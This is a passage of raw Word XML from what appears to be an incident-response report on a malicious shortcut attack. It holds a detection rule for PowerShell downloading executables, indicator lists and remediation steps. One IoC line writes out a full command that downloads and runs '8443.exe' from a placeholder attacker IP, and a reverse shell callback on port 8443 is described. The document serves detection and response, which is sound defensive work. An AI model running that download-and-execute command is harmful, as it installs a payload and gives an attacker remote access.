        <w:t xml:space="preserve">    &lt;field name="win.eventdata.commandLine" type="pcre2"&gt;powershell\.exe.*wget.*http.*\.exe&lt;/field&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640E0AF" w14:textId="4741CDA4" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;description&gt;Suspicious Process Creation: PowerShell downloading and executing an EXE via CMD (Possible Spearphishing/LNK payload)&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD60AF" w14:textId="35C16DDF" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F969E" w14:textId="0502B6F3" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;id&gt;T1566.001&lt;/id&gt; &lt;id&gt;T1059.001&lt;/id&gt; &lt;id&gt;T1059.003&lt;/id&gt; &lt;id&gt;T1105&lt;/id&gt;     &lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D25B1E" w14:textId="18B9CE4A" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3C01C" w14:textId="183FE755" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A79EB1" w14:textId="0A20FA92" w:rsidR="53BB567B" w:rsidRDefault="53BB567B" w:rsidP="53BB567B"/>
    <w:p w14:paraId="3B143611" w14:textId="6DA029A7" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72922A69" w14:textId="248D166D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Indicators of Compromise (IoCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9C499" w14:textId="547BD990" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host-based IoCs (file locations + expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81D0F9" w14:textId="796B1473" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB709F1" w14:textId="5B4221CF" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Malicious shortcut file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C1D97" w14:textId="64720190" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Location: C:\icrm\notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E91C7" w14:textId="02CA8C4F" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Expected value: Type is “Shortcut (.lnk)” (not a legitimate Notepad binary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874B68E" w14:textId="3F6D691D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Suspicious behaviour: shortcut masquerades as a trusted Windows executable name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B07E8" w14:textId="347C74DC" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E83EB2B" w14:textId="5689BAF7" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Downloaded payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA146BF" w14:textId="7CBC7DE3" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Location: C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC67478" w14:textId="56FDA80F" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expected value: created shortly after shortcut click; may be removed after execution (cleanup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AF81D" w14:textId="5CA667B8" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4D4A8" w14:textId="2955A3A4" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command-line / configuration IoCs (expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E84A1" w14:textId="25384490" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2D062" w14:textId="45DE9364" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Shortcut target contains download-and-execute chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32172072" w14:textId="59728E90" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE7E5E" w14:textId="7D29BC3B" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63662B7B" w14:textId="2AB68A16" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Suspicious process chain (expected telemetry pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5520C" w14:textId="0CA39CB0" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>explorer.exe (or mail client) → cmd.exe → powershell.exe → 8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AA8F5" w14:textId="116F7018" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5FAC78" w14:textId="7DC5066F" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network IoCs (expected values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA82C2" w14:textId="49F2C009" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE12236" w14:textId="0E00C85D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Payload retrieval:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32351CC3" w14:textId="02DB8642" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Source: &lt;VICTIM_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57347234" w14:textId="1C75717F" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Destination: &lt;ATTACKER_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2723FAD3" w14:textId="01FC59D3" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Request: GET /8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BD3C5" w14:textId="590BAD68" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Expected value: HTTP 200 responses in server logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A73AAF" w14:textId="61BE6875" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A15455" w14:textId="5770A262" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse shell callback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE7AD7" w14:textId="5689F39D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Source: &lt;VICTIM_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9DD5E" w14:textId="33E0A09D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Destination: &lt;ATTACKER_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3C253" w14:textId="59B2BD7D" w:rsidR="00695885" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:t>Port: 8443/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A7C0C5" w14:textId="6F839A06" w:rsidR="00695885" w:rsidRDefault="00695885" w:rsidP="6845FCFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159B1598" w14:textId="77777777" w:rsidR="00C3354B" w:rsidRDefault="6845FCFF" w:rsidP="00C3354B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc220896683"/>
      <w:commentRangeStart w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="16"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="51A27F43" w14:textId="3B3C9A3A" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Containment (stop the attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D13EAD" w14:textId="3A5F7801" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B92D17" w14:textId="5CECB4E5" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Immediately isolate the affected host from the network (disconnect or EDR isolate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AB15A" w14:textId="21760D52" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FBC0A" w14:textId="40231503" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Terminate suspicious processes if active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4B8BE" w14:textId="10A5EF04" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>cmd.exe, powershell.exe, and unknown executables related to the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F484AA" w14:textId="7B8B4A73" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2829D" w14:textId="74488322" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Block current attacker connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3117B" w14:textId="585D2C39" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Temporarily block outbound to attacker IP &lt;ATTACKER_IP&gt; and port 8443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3B42F4" w14:textId="4C42489D" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A40EA" w14:textId="5D3F37DE" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eradication (remove sources of compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CBDBE" w14:textId="588C5237" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAFC1C" w14:textId="2C190BE9" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Preserve evidence (screenshots/log exports) before removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82C03E" w14:textId="3B9066B7" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317D0506" w14:textId="6358421E" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Remove malicious artefacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B528F2" w14:textId="725B34C9" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A94E5F" w14:textId="36DE548A" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Delete C:\icrm\notepad.exe (malicious LNK shortcut)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D9ABB" w14:textId="06532FFB" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Delete C:\icrm\8443.exe if present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E38A314" w14:textId="09298044" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E896EB5" w14:textId="4B555581" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct a scan and confirm no persistence (startup entries, scheduled tasks, registry Run keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB872E" w14:textId="0860D707" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B5969F" w14:textId="711F201F" w:rsidR="00D01BC9" w:rsidRPr="00D01BC9" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
